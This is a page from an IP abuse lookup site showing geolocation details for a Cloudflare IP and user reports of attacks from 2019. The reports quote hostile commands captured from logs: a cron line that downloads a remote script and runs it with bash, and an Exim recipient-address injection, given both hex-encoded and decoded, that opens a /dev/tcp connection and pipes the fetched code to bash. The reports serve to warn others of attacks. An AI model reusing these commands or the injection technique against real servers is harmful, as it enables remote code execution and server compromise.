allows you to lookup or report an IP abuse case. Please take note that the abuse records listed on this website was the summarized results compiled from all reporters, and it's only just for your information. We do not guarantee the correctness, reliability and completeness of the abuse data.

Live IP Map

You have exceed your daily query limit.


IP Information

IP Address
Country country flag United States
Region Virginia
City Ashburn
Latitude 39.04372
Longitude -77.48749
ZIP Code 20146
Time Zone UTC -04:00
ISP CloudFlare Inc.
Net Speed T1
Usage Type (CDN) Content Delivery Network
IDD Code 1
Area Code 703
Elevation 89 meters
Weather Ashburn (USVA0027)
Weather Condition View Weather
Abuse Recorded

Reported on 26 Mar, 2019 12:02:37 AM

local ip directed to ip

Hacking IP

Reported on 06 Apr, 2019 04:00:41 AM

Distributing Troj/DwnLdr-JUR

Downloads then installs antimalware.ext to C:WindowsTemp

Reported on 15 Apr, 2019 09:51:15 AM


*/5 * * * * /usr/bin/wget -q -O /tmp/seasame && bash /tmp/seasame then run /boot/vmlinuz process with 100% CPU.

Reported on 15 Apr, 2019 08:18:57 PM

FTP download

Server tried downloading via ftp to this server over port 201

Reported on 16 Apr, 2019 06:41:16 PM

Malware attack

malware is spread using

Reported on 17 Apr, 2019 08:23:03 PM

linux port opened

delays server boot

Reported on 28 Apr, 2019 08:23:29 AM

Atlassian confluence hacked

Atlassian confluence hacked

Reported on 28 May, 2019 02:07:55 PM

unautharized connection established with

/boot/vmlinuz process with 100% CPU

Reported on 15 Jun, 2019 04:56:09 PM

Target server for an email-based attack

Receiving e-mails from various IPs with encoded addresses that look like "root+${run{x2fbinx2fbash...}}@localhost" and are decoded as, for example, /bin/bash -c "exec 5<>/dev/tcp/;echo -e 'GET / HTTP/1.0n' >&5;tail -n 11 <&5 | bash" &

Reported on 16 Jun, 2019 08:36:28 PM

Tried to inject malicious code into mail server through recipient address

Received the following warning from exim mail server logs: Message 1hcbkW-0007kn-0D has been frozen (delivery error message). The sender is <>. The following address(es) have yet to be delivered: root+${run{x2fbinx2fbashx20x2dcx20x22x65x78x65x63x20x35x3cx3ex2fx64x65x76x2fx74x63x70x2fx35x31x2ex33x38x2ex31x33x33x2ex32x33x32x2fx38x30x3bx65x63x68x6fx20x2dx65x20x27x47x45x54x20x2fx20x48x54x54x50x2fx31x2ex30x5cx6ex27x20x3ex26x35x3bx74x61x69x6cx20x2dx6ex20x2bx31x31x20x3cx26x35x20x7cx20x62x61x73x68x22x20x26}}@localhost: Too many "Received" headers - suspected mail loop This decodes to: root+${run{/bin/bash -c "exec 5<>/dev/tcp/;echo -e 'GET / HTTP/1.0n' >&5;tail -n +11 <&5 | bash" &}}@localhost Which is obviously an attempt to download malicious code.

This site uses the IP2Location geolocation data which is available for download at If you would like to check if the given IP address is an proxy, you may use this tool IP Proxy Detection for lookup.

Recent Lookup IP Addresses


LiveIPMap is a platform open for everyone to report an IP abuse case or to request the release of a falsified abuse case. Anyone is free to lookup for an abuse case. Abuse data listed on this website is real-time updated.

You can click on the Not An Abuse button to dispute an abuse report. Our QA team will review your reason for the delistling. However, the delisting process may take up days or weeks depending on our load..